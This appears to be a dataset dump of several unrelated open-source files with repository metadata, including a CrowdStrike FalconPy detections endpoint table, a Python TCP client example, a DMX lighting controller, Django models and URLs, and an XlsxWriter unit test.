boundary.append((W - lrw, W, H - lrh, H))
elif r == num - 1:
boundary.append((rw * c - offset(wk, ws, c), rw * c - offset(wk, ws, c) + rw, H - lrh, H))
elif c == num - 1:
boundary.append((W - lrw, W, rh * r - offset(hk, hs, r), rh * r - offset(hk, hs, r) + rh))
else:
boundary.append(
(
rw * c - offset(wk, ws, c),
rw * c - offset(wk, ws, c) + rw,
rh * r - offset(hk, hs, r),
rh * r - offset(hk, hs, r) + rh,
)
)
return Lambda(
lambda x:
[x[:, lb:rb, ub:db, :] for lb, rb, ub, db in boundary]
)(X)
def merge(tensors):
"""
The merge function will concatenate all inputs vertically and
then horizontally.
"""
size = int(math.sqrt(len(tensors)))
rows = [Concatenate(axis=1)(tensors[k * size:k * size + size]) for k in range(size)]
return Concatenate(axis=2)(rows)
def conv(tensors, filters, kernal, strides, padding, activation, name):
layer = Conv2D(filters, kernal, strides=strides, padding=padding, activation=activation, name=name + '_conv')
return [layer(x) for x in tensors] | [
"caojiashen24@gmail.com"
] | caojiashen24@gmail.com |
e3bffe4732ee4bf7605b867c07cc21b165766526 | b6ab4693aa077097a8b503aeacafb53c8761aeaf | /src/falconpy/_endpoint/_detects.py | da37c54240368cb1744719d1aae736953fa17171 | [
"Unlicense"
] | permissive | woodtechie1428/falconpy | 36bd2ed85f629b43e7644c2c29d369eda3800ff7 | fcbec209f04a8d2340c66a5bea5c27c421f550d1 | refs/heads/main | 2023-08-03T09:14:10.930495 | 2021-09-10T15:58:39 | 2021-09-10T15:58:39 | 406,604,183 | 0 | 0 | Unlicense | 2021-09-15T03:44:50 | 2021-09-15T03:44:48 | null | UTF-8 | Python | false | false | 6,483 | py | """
_______ __ _______ __ __ __
| _ .----.-----.--.--.--.--| | _ | |_.----|__| |--.-----.
|. 1___| _| _ | | | | _ | 1___| _| _| | <| -__|
|. |___|__| |_____|________|_____|____ |____|__| |__|__|__|_____|
|: 1 | |: 1 |
|::.. . | CROWDSTRIKE FALCON |::.. . | FalconPy
`-------' `-------'
OAuth2 API - Customer SDK
_endpoint._detects - Internal API endpoint constant library
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
For more information, please refer to <https://unlicense.org>
"""
_detects_endpoints = [
[
"GetAggregateDetects",
"POST",
"/detects/aggregates/detects/GET/v1",
"Get detect aggregates as specified via json in request body.",
"detects",
[
{
"description": "Query criteria and settings",
"name": "body",
"in": "body",
"required": True
}
]
],
[
"UpdateDetectsByIdsV2",
"PATCH",
"/detects/entities/detects/v2",
"Modify the state, assignee, and visibility of detections",
"detects",
[
{
"description": "This endpoint modifies attributes (state and assignee) of detections. \n\n"
"This endpoint accepts a query formatted as a JSON array of key-value pairs. "
"You can update one or more attributes one or more detections with a single request.\n\n"
"**`assigned_to_uuid` values**\n\nA user ID, such as `1234567891234567891`\n\n**`ids` values**\n\n"
"One or more detection IDs, which you can find with the `/detects/queries/detects/v1` endpoint, "
"the Falcon console, or the Streaming API.\n\n**`show_in_ui` values**\n\n- `true`: "
"This detection is displayed in Falcon\n- `false`: This detection is not displayed in Falcon. "
"Most commonly used together with the `status` key's `false_positive` value.\n\n**`status` "
"values**\n\n- `new`\n- `in_progress`\n- `true_positive`\n- `false_positive`\n- `ignored`\n\n**`comment` "
"values**\nOptional comment to add to the detection. Comments are displayed with the detection in "
"Falcon and usually used to provide context or notes for other Falcon users. "
"A detection can have multiple comments over time.",
"name": "body",
"in": "body",
"required": True
}
]
],
[
"GetDetectSummaries",
"POST",
"/detects/entities/summaries/GET/v1",
"View information about detections",
"detects",
[
{
"description": "View key attributes of detections, including the associated host, "
"[disposition](https://falcon.crowdstrike.com/support/documentation/2/query-api-reference#patterndispositionvalue), "
"objective/tactic/technique, adversary, and more. Specify one or more detection IDs (max 1000 per request). "
"Find detection IDs with the `/detects/queries/detects/v1` endpoint, the Falcon console, or the Streaming API.",
"name": "body",
"in": "body",
"required": True
}
]
],
[
"QueryDetects",
"GET",
"/detects/queries/detects/v1",
"Search for detection IDs that match a given query",
"detects",
[
{
"type": "integer",
"description": "The first detection to return, where `0` is the latest detection. Use with the `limit` "
"parameter to manage pagination of results.",
"name": "offset",
"in": "query"
},
{
"maximum": 9999,
"minimum": 0,
"type": "integer",
"description": "The maximum number of detections to return in this response (default: 9999; max: 9999). "
"Use with the `offset` parameter to manage pagination of results.",
"name": "limit",
"in": "query"
},
{
"type": "string",
"description": "Sort detections using these options:\n\n- `first_behavior`: Timestamp of the first "
"behavior associated with this detection\n- `last_behavior`: Timestamp of the last behavior associated "
"with this detection\n- `max_severity`: Highest severity of the behaviors associated with this detection\n"
"- `max_confidence`: Highest confidence of the behaviors associated with this detection\n- `adversary_id`: "
"ID of the adversary associated with this detection, if any\n- `devices.hostname`: Hostname of the host "
"where this detection was detected\n\nSort either `asc` (ascending) or `desc` (descending). "
"For example: `last_behavior|asc`",
"name": "sort",
"in": "query"
},
{
"type": "string",
"description": "Filter detections using a query in Falcon Query Language (FQL) An asterisk wildcard `*` "
"includes all results. \n\nCommon filter options include:\n\n- `status`\n- `device.device_id`\n"
"- `max_severity`\n\nThe full list of valid filter options is extensive. "
"Review it in our [documentation inside the Falcon console]"
"(https://falcon.crowdstrike.com/support/documentation/2/query-api-reference#detections_fql).",
"name": "filter",
"in": "query"
},
{
"type": "string",
"description": "Search all detection metadata for the provided string",
"name": "q",
"in": "query"
}
]
]
]
| [
"noreply@github.com"
] | woodtechie1428.noreply@github.com |
4fd1a36063610493d16705b91faca3442fdc810a | 480e33f95eec2e471c563d4c0661784c92396368 | /Geometry/HGCalCommonData/test/python/dumpTBGeometryDDD_cfg.py | 998122a85ad6a346ff919cce319dcc301f314db8 | [
"Apache-2.0"
] | permissive | cms-nanoAOD/cmssw | 4d836e5b76ae5075c232de5e062d286e2026e8bd | 4eccb8a758b605875003124dd55ea58552b86af1 | refs/heads/master-cmsswmaster | 2021-01-23T21:19:52.295420 | 2020-08-27T08:01:20 | 2020-08-27T08:01:20 | 102,867,729 | 7 | 14 | Apache-2.0 | 2022-05-23T07:58:09 | 2017-09-08T14:03:57 | C++ | UTF-8 | Python | false | false | 821 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("DUMP")
process.load("Geometry.HGCalCommonData.testTB181XML_cfi")
process.load('FWCore.MessageService.MessageLogger_cfi')
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('G4cerr')
process.MessageLogger.categories.append('G4cout')
process.MessageLogger.categories.append('HGCalGeom')
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.add_(cms.ESProducer("TGeoMgrFromDdd",
verbose = cms.untracked.bool(False),
level = cms.untracked.int32(14)
))
process.dump = cms.EDAnalyzer("DumpSimGeometry",
outputFileName = cms.untracked.string('TBGeom.root'))
process.p = cms.Path(process.dump)
| [
"sunanda.banerjee@cern.ch"
] | sunanda.banerjee@cern.ch |
cc13959b1a9094efbf53216060b6eaf7feafd9ae | fa6c1bb73b6c779b3e37dedb0b45fed44424ca49 | /ch11/tcp_client.py | e11599c678d28c25ca2bdfefba0f230b4b94075f | [] | no_license | choidslab/IntroducingPython | 7f9d4ddb4a8f107b20d1a02ee75dbe2490ab22e1 | 7d0a3c9efffe1c69fd93fcc21123126051b44893 | refs/heads/master | 2020-04-02T17:37:48.975059 | 2018-11-03T03:50:23 | 2018-11-03T03:50:23 | 154,665,095 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | import socket
from datetime import datetime
server_address = ('localhost', 1234)
max_size = 1000
print("Starting the client at", datetime.now())
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 소켓 생성
client.connect(server_address) # 서버에 연결
client.sendall(b'Hey!') # 서버에 데이터 전송
data = client.recv(max_size) # 서버로부터 데이터 수신
print('At', datetime.now(), 'someone replied', data)
client.close()
| [
"dslab0915@gmail.com"
] | dslab0915@gmail.com |
60c30503a5fef6b3d8da46f31bfc23e7c8d4f000 | df65ecba3a23bc054758b429f45a92f53e131904 | /Lights/DMX_Driver.py | 8d410c05e6fb432929762cc821a280ca5cdb6dc7 | [] | no_license | tahaase/LeapLights | d1ef7893a8de6cca8e6eaab6dbd00be702ff216b | 198ae63de9b3b29448a142aa04459cee44f47eaf | refs/heads/master | 2020-03-21T02:11:11.735731 | 2018-06-20T06:29:32 | 2018-06-20T06:29:32 | 137,985,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,024 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 9 16:49:27 2015
@author: Thomas Haase
"""
import pysimpledmx
class DMX_Controller():
def __init__(self, usb_port,start_port,start_color,inverted):
self.dmx_com = pysimpledmx.DMXConnection(usb_port)
self.x_channel = start_port
self.y_channel = start_port+1
self.color_channel = start_port+2
self.dimmer_channel = start_port+5
self.color_table = [10,20,35,50,65,80,95,110,125]
self.color_index = start_color
self.invert = inverted
self.dmx_com.setChannel(self.x_channel,128)
self.dmx_com.setChannel(self.y_channel,128)
self.dmx_com.setChannel(self.color_channel,self.color_table[self.color_index])
self.dmx_com.setChannel(start_port+3,5) #Open gobo
self.dmx_com.setChannel(start_port+4,10) #Open Shutter
self.dmx_com.setChannel(self.dimmer_channel,255)
self.dmx_com.render()
def update_position(self,position_data):
hand_position = [position_data[0],position_data[1]]
if (abs(hand_position[0])>255):
if (hand_position[0]<-255):
hand_position[0] = -255
else:
hand_position[0] = 255
if (hand_position[1]<70):
hand_position[1] = 70
elif (hand_position[1]>402):
hand_position[1] = 402
hand_position[0] = hand_position[0] + 255
hand_position[0] = int(hand_position[0]/2.0)
hand_position[1] = hand_position[1] - 70
hand_position[1] = hand_position[1]*0.766
hand_position[1] = int((1 - hand_position[1]/255)*255)
if self.invert:
hand_position[0] = 255 - hand_position[0]
hand_position[1] = 255- hand_position[1]
self.dmx_com.setChannel(self.x_channel,hand_position[0])
self.dmx_com.render()
self.dmx_com.setChannel(self.y_channel,hand_position[1])
self.dmx_com.render()
def change_color(self):
self.color_index = self.color_index+1
if (self.color_index > 8):
self.color_index = 0
self.dmx_com.setChannel(self.color_channel,self.color_table[self.color_index])
self.dmx_com.render()
print "color changed"
def light_intensity(self,grip_strength):
dimmer_value = int((1-grip_strength)*255)
self.dmx_com.setChannel(self.dimmer_channel,dimmer_value)
self.dmx_com.render()
# print dimmer_value
class DMX_Controller_Chained():
def __init__(self, usb_port,start_port_r,start_color_r,start_port_l,start_color_l,invert_r, invert_l):
self.dmx_com = pysimpledmx.DMXConnection(usb_port)
self.x_channel_r = start_port_r
self.y_channel_r = start_port_r+1
self.color_channel_r = start_port_r+2
self.dimmer_channel_r = start_port_r+5
self.color_table = [10,20,35,50,65,80,95,110,125]
self.color_index_r = start_color_r
self.invert_r = invert_r
self.dmx_com.setChannel(self.x_channel_r,128)
self.dmx_com.setChannel(self.y_channel_r,128)
self.dmx_com.setChannel(self.color_channel_r,self.color_table[self.color_index_r])
self.dmx_com.setChannel(start_port_r+3,5) #Open gobo
self.dmx_com.setChannel(start_port_r+4,10) #Open Shutter
self.dmx_com.setChannel(self.dimmer_channel_r,255)
self.x_channel_l = start_port_l
self.y_channel_l = start_port_l+1
self.color_channel_l = start_port_l+2
self.dimmer_channel_l = start_port_l+5
self.color_table = [10,20,35,50,65,80,95,110,125]
self.color_index_l = start_color_l
self.invert_l = invert_l
self.dmx_com.setChannel(self.x_channel_l,128)
self.dmx_com.setChannel(self.y_channel_l,128)
self.dmx_com.setChannel(self.color_channel_l,self.color_table[self.color_index_l])
self.dmx_com.setChannel(start_port_l+3,5) #Open gobo
self.dmx_com.setChannel(start_port_l+4,10) #Open Shutter
self.dmx_com.setChannel(self.dimmer_channel_l,255)
self.dmx_com.render()
def update_position(self,position_data_r, position_data_l):
#Do right hand first.
hand_position = [position_data_r[0],position_data_r[1]]
if (abs(hand_position[0])>255):
if (hand_position[0]<-255):
hand_position[0] = -255
else:
hand_position[0] = 255
if (hand_position[1]<70):
hand_position[1] = 70
elif (hand_position[1]>402):
hand_position[1] = 402
hand_position[0] = hand_position[0] + 255
hand_position[0] = int(hand_position[0]/2.0)
hand_position[1] = hand_position[1] - 70
hand_position[1] = hand_position[1]*0.766
hand_position[1] = int((1 - hand_position[1]/255)*255)
if self.invert_r:
hand_position[0] = 255 - hand_position[0]
hand_position[1] = 255- hand_position[1]
self.dmx_com.setChannel(self.x_channel_r,hand_position[0])
self.dmx_com.render()
self.dmx_com.setChannel(self.y_channel_r,hand_position[1])
self.dmx_com.render()
#Now do left hand
hand_position = [position_data_l[0],position_data_l[1]]
if (abs(hand_position[0])>255):
if (hand_position[0]<-255):
hand_position[0] = -255
else:
hand_position[0] = 255
if (hand_position[1]<70):
hand_position[1] = 70
elif (hand_position[1]>402):
hand_position[1] = 402
hand_position[0] = hand_position[0] + 255
hand_position[0] = int(hand_position[0]/2.0)
hand_position[1] = hand_position[1] - 70
hand_position[1] = hand_position[1]*0.766
hand_position[1] = int((1 - hand_position[1]/255)*255)
if self.invert_l:
hand_position[0] = 255 - hand_position[0]
hand_position[1] = 255- hand_position[1]
self.dmx_com.setChannel(self.x_channel_l,hand_position[0])
self.dmx_com.render()
self.dmx_com.setChannel(self.y_channel_l,hand_position[1])
self.dmx_com.render()
def change_color(self,isRight):
if isRight:
self.color_index_r = self.color_index_r+1
if (self.color_index_r > 8):
self.color_index_r = 0
self.dmx_com.setChannel(self.color_channel_r,self.color_table[self.color_index_r])
self.dmx_com.render()
print "Right color changed"
else:
self.color_index_l = self.color_index_l+1
if (self.color_index_l > 8):
self.color_index_l = 0
self.dmx_com.setChannel(self.color_channel_l,self.color_table[self.color_index_l])
self.dmx_com.render()
print "Left color changed"
def light_intensity(self,grip_strength_r,grip_strength_l):
dimmer_value = int((1-grip_strength_r)*255)
self.dmx_com.setChannel(self.dimmer_channel_r,dimmer_value)
self.dmx_com.render()
dimmer_value = int((1-grip_strength_l)*255)
self.dmx_com.setChannel(self.dimmer_channel_l,dimmer_value)
self.dmx_com.render() | [
"tahaase10@gmail.com"
] | tahaase10@gmail.com |
b64fd5f3af9a2a05ac6bdb4d8311adc85cdf8381 | 46ddd2e23181e5ad4dc0e2960a37379f5865f677 | /7-3_SocialNetwork.py | 0956428a9bcfd79db9f684e5aa84a257ab67d219 | [] | no_license | marekbrzo/PythonDataAnalysisNotes | abbbdd6abb5a9472c1ccdbf3d64b6e983095bfc3 | ba139cb623fbda8e3581c557ced0f1290a830040 | refs/heads/master | 2020-05-05T02:42:08.111646 | 2019-08-10T04:34:43 | 2019-08-10T04:34:43 | 179,647,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,850 | py | # Simulating a Social Network
# Three easy steps: 1. Generate graph object and edge list. 2. Assign attributes to graph nodes. 3. Visualize the network
#%%
import numpy as numpy
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
import networkx as nx
from pylab import rcParams
#%%
rcParams['figure.figsize'] = 5,4
sb.set_style('whitegrid')
#%%
# Generating a graph object and edgelist
DG = nx.gn_graph(7,seed=25)
for line in nx.generate_edgelist(DG,data = False):
print(line)
#%%
# Assign attributes to nodes, such as name, weight, directions.
print(DG.node[0])
#%%
DG.node[0]["name"] = 'Alice'
print(DG.node[0])
#%%
DG.node[1]["name"] = 'Bob'
DG.node[2]["name"] = 'Claire'
DG.node[3]["name"] = 'Dennis'
DG.node[4]["name"] = 'Esther'
DG.node[5]["name"] = 'Frank'
DG.node[6]["name"] = 'George'
#%%
# Other methods to add to the nodes
DG.add_nodes_from([(0,{'age':25}),(1,{'age':31}),(2,{'age':18}),(3,{'age':47}),(4,{'age':22}),(5,{'age':23}),(6,{'age':50})])
print(DG.node[0])
#%%
DG.node[0]["gender"] = 'f'
DG.node[1]["gender"] = 'm'
DG.node[2]["gender"] = 'f'
DG.node[3]["gender"] = 'm'
DG.node[4]["gender"] = 'f'
DG.node[5]["gender"] = 'm'
DG.node[6]["gender"] = 'm'
print(DG.node[0])
#%%
nx.draw_circular(DG, node_color = 'bisque', with_labels = True)
#%%
# Labelling the graph
labeldict = {0:'Alice',1:'Bob',2:'Claire',3:'Dennis',4:'Esther',5:'Frank',6:'George'}
nx.draw_circular(DG, node_color = 'bisque', with_labels = True, labels =labeldict)
#%%
G = DG.to_undirected()
nx.draw_spectral(G, node_color = 'bisque', with_labels = True, labels =labeldict)
#%%
# Directional network graphs can tell us who is the most important person in the graph. Once we remove direction then the person become
# the least important | [
"noreply@github.com"
] | marekbrzo.noreply@github.com |
095cfe669aa0d686acc36de7f75e80eed2b7571f | 519ec05d3e86863e334655d79635afa58523a78a | /lib/get_series_imdb.py | 84362c6baa898a386bf3b9bdc0a3492d7a2db10e | [] | no_license | orionwinter/datasets | 56fa8af238849befc4c1251efbef54d2e37c02d9 | 6b2b9c1cd81a8635f54722f16be10187d638c492 | refs/heads/master | 2020-05-21T01:08:58.222562 | 2020-02-14T17:58:10 | 2020-02-14T17:58:10 | 185,849,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 522 | py | # coding: utf-8
import pandas as pd
import numpy as np
series_imdb = pd.read_csv("https://raw.githubusercontent.com/nazareno/imdb-series/master/data/series_from_imdb.csv")
got_e_bb = series_imdb.query(
"series_name in ['Breaking Bad', 'Game of Thrones', 'Vikings', 'Better Call Saul', 'Homeland']"
).reset_index(
drop=True
).filter(
items=["series_name", "episode", "series_ep", "season", "season_ep", "user_rating", "user_votes"]
)
got_e_bb.to_csv("../docs/series_imdb_5_series.csv", index=False)
| [
"orion.winter66@gmail.com"
] | orion.winter66@gmail.com |
5549e1a88fac1ca44072cd16340c142248867b94 | 45444446d97b85859a3b378e00d6a8148e4f2697 | /authentication/urls.py | dbcbad67c900796a95dfac81c2f6c722a8fa7260 | [] | no_license | StepanTita/goli | d89f42d106b8080d0bcf604c77550b603c135f21 | 622b3427fa4c650f8677657c626da1ca5c6cf726 | refs/heads/master | 2022-12-23T09:06:23.545816 | 2020-10-04T11:55:09 | 2020-10-04T11:55:09 | 300,861,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from django.urls import path, include
from rest_framework.authtoken import views as auth_views
from django.contrib.auth import views as login_views
from django.views.decorators.csrf import csrf_exempt
from rest_framework.authtoken.views import obtain_auth_token
from authentication import views
urlpatterns = [
# path('', include('rest_framework.urls')),
path('login/', obtain_auth_token),
path('logout/', csrf_exempt(login_views.LogoutView.as_view())),
path('token/', auth_views.obtain_auth_token, name='token'),
path('register/', views.CreateUserAPIView.as_view(), name='register')
]
| [
"stepan.tytarenko@nure.ua"
] | stepan.tytarenko@nure.ua |
37483fd1e0d9006657489d14e97b898faed7670f | 45de7d905486934629730945619f49281ad19359 | /xlsxwriter/test/worksheet/test_cond_format22.py | 4c5f28418e89a70c30d923a17b0cf44b9f5c802f | [
"BSD-2-Clause"
] | permissive | jmcnamara/XlsxWriter | 599e1d225d698120ef931a776a9d93a6f60186ed | ab13807a1be68652ffc512ae6f5791d113b94ee1 | refs/heads/main | 2023-09-04T04:21:04.559742 | 2023-08-31T19:30:52 | 2023-08-31T19:30:52 | 7,433,211 | 3,251 | 712 | BSD-2-Clause | 2023-08-28T18:52:14 | 2013-01-04T01:07:06 | Python | UTF-8 | Python | false | false | 8,726 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2023, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
"""
Test assembling a complete Worksheet file.
"""
def test_assemble_xml_file(self):
"""Test writing a worksheet with conditional formatting."""
self.maxDiff = None
fh = StringIO()
worksheet = Worksheet()
worksheet._set_filehandle(fh)
worksheet.select()
worksheet.write("A1", 1)
worksheet.write("A2", 2)
worksheet.write("A3", 3)
worksheet.write("A4", 4)
worksheet.write("A5", 5)
worksheet.write("A6", 6)
worksheet.write("A7", 7)
worksheet.write("A8", 8)
worksheet.write("A9", 9)
worksheet.conditional_format(
"A1", {"type": "icon_set", "icon_style": "3_arrows"}
)
worksheet.conditional_format(
"A2", {"type": "icon_set", "icon_style": "3_flags"}
)
worksheet.conditional_format(
"A3", {"type": "icon_set", "icon_style": "3_traffic_lights_rimmed"}
)
worksheet.conditional_format(
"A4", {"type": "icon_set", "icon_style": "3_symbols_circled"}
)
worksheet.conditional_format(
"A5", {"type": "icon_set", "icon_style": "4_arrows"}
)
worksheet.conditional_format(
"A6", {"type": "icon_set", "icon_style": "4_red_to_black"}
)
worksheet.conditional_format(
"A7", {"type": "icon_set", "icon_style": "4_traffic_lights"}
)
worksheet.conditional_format(
"A8", {"type": "icon_set", "icon_style": "5_arrows_gray"}
)
worksheet.conditional_format(
"A9", {"type": "icon_set", "icon_style": "5_quarters"}
)
worksheet._assemble_xml_file()
exp = _xml_to_list(
"""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<dimension ref="A1:A9"/>
<sheetViews>
<sheetView tabSelected="1" workbookViewId="0"/>
</sheetViews>
<sheetFormatPr defaultRowHeight="15"/>
<sheetData>
<row r="1" spans="1:1">
<c r="A1">
<v>1</v>
</c>
</row>
<row r="2" spans="1:1">
<c r="A2">
<v>2</v>
</c>
</row>
<row r="3" spans="1:1">
<c r="A3">
<v>3</v>
</c>
</row>
<row r="4" spans="1:1">
<c r="A4">
<v>4</v>
</c>
</row>
<row r="5" spans="1:1">
<c r="A5">
<v>5</v>
</c>
</row>
<row r="6" spans="1:1">
<c r="A6">
<v>6</v>
</c>
</row>
<row r="7" spans="1:1">
<c r="A7">
<v>7</v>
</c>
</row>
<row r="8" spans="1:1">
<c r="A8">
<v>8</v>
</c>
</row>
<row r="9" spans="1:1">
<c r="A9">
<v>9</v>
</c>
</row>
</sheetData>
<conditionalFormatting sqref="A1">
<cfRule type="iconSet" priority="1">
<iconSet iconSet="3Arrows">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="33"/>
<cfvo type="percent" val="67"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A2">
<cfRule type="iconSet" priority="2">
<iconSet iconSet="3Flags">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="33"/>
<cfvo type="percent" val="67"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A3">
<cfRule type="iconSet" priority="3">
<iconSet iconSet="3TrafficLights2">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="33"/>
<cfvo type="percent" val="67"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A4">
<cfRule type="iconSet" priority="4">
<iconSet iconSet="3Symbols">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="33"/>
<cfvo type="percent" val="67"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A5">
<cfRule type="iconSet" priority="5">
<iconSet iconSet="4Arrows">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="25"/>
<cfvo type="percent" val="50"/>
<cfvo type="percent" val="75"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A6">
<cfRule type="iconSet" priority="6">
<iconSet iconSet="4RedToBlack">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="25"/>
<cfvo type="percent" val="50"/>
<cfvo type="percent" val="75"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A7">
<cfRule type="iconSet" priority="7">
<iconSet iconSet="4TrafficLights">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="25"/>
<cfvo type="percent" val="50"/>
<cfvo type="percent" val="75"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A8">
<cfRule type="iconSet" priority="8">
<iconSet iconSet="5ArrowsGray">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="20"/>
<cfvo type="percent" val="40"/>
<cfvo type="percent" val="60"/>
<cfvo type="percent" val="80"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A9">
<cfRule type="iconSet" priority="9">
<iconSet iconSet="5Quarters">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="20"/>
<cfvo type="percent" val="40"/>
<cfvo type="percent" val="60"/>
<cfvo type="percent" val="80"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</worksheet>
"""
)
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
bce38b1477870007035b59a1dc2f07b2775b04fa | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/Himanshu.Mishra/problem.py | abd5a6a5b627365883042f53a6cc564bc5e737e7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,389 | py | def isprime(n):
if n == 2:
return True
if not n & 1:
return False
return pow(2, n-1, n) == 1
# def isprime(n):
# """Returns True if n is prime."""
# if n == 2:
# return True
# if n == 3:
# return True
# if n % 2 == 0:
# return False
# if n % 3 == 0:
# return False
# i = 5
# w = 2
# while i * i <= n:
# if n % i == 0:
# return False
# i += w
# w = 6 - w
# return True
def isDivisibleBy(num):
for i in range(2, num):
if num%i==0:
return i
def main():
data = []
print("Case #1:")
for i in range(35):
num = 2**i
# print(num, len(bin(num)[2:]), bin(num+1)[2:], bin(int(num*2-1))[2:])
data.append([num+1, int(num*2-1)])
N = 32
count = 0
startingNumber = data[N-1][0]
finalNumber = data[N-1][1]
for i in range(startingNumber, finalNumber+1, 2):
numstr = bin(i)[2:]
base = [int(numstr, 2), int(numstr, 3), int(numstr, 4), int(numstr, 5), int(numstr, 6), int(numstr, 7), int(numstr, 8), int(numstr, 9), int(numstr, 10)]
# print(base)
flag = 0
for j in base:
if not isprime(j):
flag = 1
else:
flag = 0
break
if flag == 1:
if count >= 700:
break
else:
count = count + 1
answer = str(base[10-2])
for k in base:
answer += " " + str(isDivisibleBy(k))
print(answer)
if __name__ == '__main__':
main() | [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
a748b503eca025f4b05eaf27620d517b548809cb | 2c66c1babb836e1c3e18d0f741992485a3e25be3 | /web/domains/application/_import/models.py | aa24f57f9a7f2c63d212837f63a556e422f3ade1 | [] | no_license | PaoloC68/icms | 29a3a980fee4dfb8fc39d9ef47af113fbb140b2d | ec47aa10750072b9df355a2c82f8f5f6471e8157 | refs/heads/master | 2022-11-21T08:29:09.339666 | 2020-02-10T11:23:26 | 2020-02-10T11:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,858 | py | from django.db import models
from web.domains.case._import.models import ImportCase
from web.domains.commodity.models import CommodityGroup, CommodityType
from web.domains.country.models import Country, CountryGroup
from web.domains.importer.models import Importer
from web.domains.office.models import Office
from web.domains.template.models import Template
from web.domains.user.models import User
class ImportApplicationType(models.Model):
is_active = models.BooleanField(blank=False, null=False)
type_code = models.CharField(max_length=30, blank=False, null=False)
type = models.CharField(max_length=70, blank=False, null=False)
sub_type_code = models.CharField(max_length=30, blank=False, null=False)
sub_type = models.CharField(max_length=70, blank=True, null=True)
licence_type_code = models.CharField(max_length=20, blank=False, null=False)
sigl_flag = models.BooleanField(blank=False, null=False)
chief_flag = models.BooleanField(blank=False, null=False)
chief_licence_prefix = models.CharField(max_length=10,
blank=True,
null=True)
paper_licence_flag = models.BooleanField(blank=False, null=False)
electronic_licence_flag = models.BooleanField(blank=False, null=False)
cover_letter_flag = models.BooleanField(blank=False, null=False)
cover_letter_schedule_flag = models.BooleanField(blank=False, null=False)
category_flag = models.BooleanField(blank=False, null=False)
sigl_category_prefix = models.CharField(max_length=100,
blank=True,
null=True)
chief_category_prefix = models.CharField(max_length=10,
blank=True,
null=True)
default_licence_length_months = models.IntegerField(blank=True, null=True)
endorsements_flag = models.BooleanField(blank=False, null=False)
default_commodity_desc = models.CharField(max_length=200,
blank=True,
null=True)
quantity_unlimited_flag = models.BooleanField(blank=False, null=False)
unit_list_csv = models.CharField(max_length=200, blank=True, null=True)
exp_cert_upload_flag = models.BooleanField(blank=False, null=False)
supporting_docs_upload_flag = models.BooleanField(blank=False, null=False)
